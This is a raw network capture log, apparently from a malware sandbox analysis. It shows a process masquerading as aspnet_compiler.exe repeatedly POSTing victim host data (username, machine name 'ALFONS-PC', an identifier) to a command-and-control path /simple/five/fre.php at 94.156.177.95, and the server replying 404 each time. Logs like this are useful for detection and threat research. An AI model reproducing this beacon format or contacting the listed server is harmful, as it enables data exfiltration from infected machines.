Nov 15, 2024 18:14:55.402070999 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:55 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49880	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:55.562556982 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:55.567481041 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:56.541213036 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:56 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49885	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:56.692954063 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:56.697887897 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:57.675513029 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:57 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49889	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:57.883132935 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:57.888076067 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:14:59.316334963 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:14:59 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49897	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:14:59.473073006 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:14:59.477956057 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:00.437112093 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:00 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49901	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:00.617867947 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:00.622720003 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:01.556570053 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:01 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49905	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:01.711424112 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:01.716470003 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:02.676476955 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:02 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49909	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:02.838454962 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:02.843350887 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:03.786936998 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:03 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49915	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:03.939058065 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:03.944044113 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:04.910248995 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:04 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49920	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:05.074208021 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:05.079129934 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:06.064785957 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:05 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49925	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:06.227369070 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:06.232263088 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:07.206125021 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:07 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49931	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:07.366914988 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:07.371818066 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:08.362751007 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:08 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49935	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:08.522666931 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:08.527825117 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:09.478656054 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:09 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49941	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:09.641161919 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:09.646080971 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:10.588184118 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:10 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49947	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:10.733527899 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:10.738507986 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:11.696425915 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:11 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49952	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:11.904120922 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:11.909050941 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:12.850373983 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:12 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49959	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:13.027446985 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:13.033206940 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:13.986828089 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49965	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:14.138925076 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:14.143908978 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:15.095793962 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:14 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49971	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:15.256006002 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:15.260992050 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:16.190433025 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:16 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49976	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:16.349315882 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:16.354360104 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:17.330138922 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:17 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49984	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
Nov 15, 2024 18:15:17.483021975 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.95 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: B29C1220 Content-Length: 153 Connection: close
Nov 15, 2024 18:15:17.488008976 CET	153	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 39 00 32 00 37 00 35 00 33 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 Data Ascii: (ckav.rualfons927537ALFONS-PC0FDD42EE188E931437F4FBE2C
Nov 15, 2024 18:15:18.442526102 CET	236	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Fri, 15 Nov 2024 17:15:18 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 23 Connection: close X-Powered-By: PHP/5.4.16 Status: 404 Not Found Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.5	49991	94.156.177.95	80	3092	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe

Timestamp	Bytes transferred	Direction	Data
